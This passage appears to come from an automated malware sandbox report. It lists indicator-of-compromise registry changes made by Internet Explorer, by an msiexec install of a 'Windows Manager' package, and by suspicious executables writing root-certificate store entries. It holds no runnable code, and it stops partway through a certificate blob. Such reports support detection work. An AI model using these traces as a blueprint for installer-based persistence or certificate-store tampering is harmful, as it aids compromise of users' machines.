\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DOMStorage\bestanimegame.com\ = "28" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DOMStorage\bestanimegame.com\ = "75" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DOMStorage\bestanimegame.com\Total = "28" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DOMStorage\bestanimegame.com\Total = "75" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "1310" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DOMStorage\bestanimegame.com\ = "1310" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff5600000000000000dc04000065020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DOMStorage\bestanimegame.com\Total = "47" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DOMStorage\bestanimegame.com\Total = "1310" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 405a0e5fb0afd701 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DOMStorage\bestanimegame.com\Total = "122" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000aaf76285c8641c44a89794754f06354f00000000020000000000106600000001000020000000c9809297f4fffdafc482d442ea445a307ca52b5dd3b5215005d8caaa3337f292000000000e8000000002000020000000607108b09d49c7d54f430a5b3ad6fdd4d3c1cf37273c710bd2035f02f5a496899000000058c233ec42f78cdb6a141eafab44fee69ab0330dd007938bd8e5873149e635fd7a283056d34caba25fa814b1c8f7b731f59215d12f8304cbd4559f5224b296e74dd3a13e252b84ab28c67194baf298c81109a5f24373ab2805cb8e84765a493842aac201bb026cbb44ee3ec5e53c0bc14de1c3ec6be3686fe5bc6e7c9f74e1f754656e1d23e825cc6cbce8c99a655ce1400000007941844b7bac8a26f3f5a15b8a4f1f8a91ccf5056a20462f9fbb5c87bea2126bf22b50455086e9935c63451976f2c732ea9db330f7b7bf102ba2d843c019a59e iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "9" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DOMStorage\bestanimegame.com\Total = "1404" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" LzmwAqmV.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E msiexec.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-421 = "Russian Daylight Time" LzmwAqmV.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates LzmwAqmV.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" LzmwAqmV.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" LzmwAqmV.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root LzmwAqmV.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time" LzmwAqmV.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-582 = "North Asia East Standard Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" LzmwAqmV.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs LzmwAqmV.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time" LzmwAqmV.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time" LzmwAqmV.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\26 msiexec.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-552 = "North Asia Standard Time" LzmwAqmV.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs LzmwAqmV.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-21 = "Cape Verde Daylight Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time" LzmwAqmV.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs LzmwAqmV.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" LzmwAqmV.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time" LzmwAqmV.exe -
Modifies registry class 24 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\DeploymentFlags = "3" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Roaming\\AW Manager\\Windows Manager 1.0.0\\install\\97FDF62\\" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26 msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Language = "1033" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\ProductIcon = "C:\\Windows\\Installer\\{C845414C-903C-4218-9DE7-132AB97FDF62}\\logo.exe" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\InstanceType = "0" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Net msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media\DiskPrompt = "[1]" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C414548CC3098124D97E31A29BF7FD26\MainFeature msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\ProductName = "Windows Manager" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\PackageCode = "6BBF4B2F4524B25478C17BFBEE2559F7" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Assignment = "1" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5785CBDF4ABB5AD409841A692AF14EA9 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\PackageName = "Windows Manager - Postback Y.msi" msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Clients = 3a0000000000 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C414548CC3098124D97E31A29BF7FD26 msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\AdvertiseFlags = "388" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\AuthorizedLUAApp = "0" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5785CBDF4ABB5AD409841A692AF14EA9\C414548CC3098124D97E31A29BF7FD26 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Roaming\\AW Manager\\Windows Manager 1.0.0\\install\\97FDF62\\" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media\1 = ";" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Version = "16777216" msiexec.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Sun1917b8fb5f09db8.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Sun1917b8fb5f09db8.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 Sun19de8ff4b6aefeb8.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47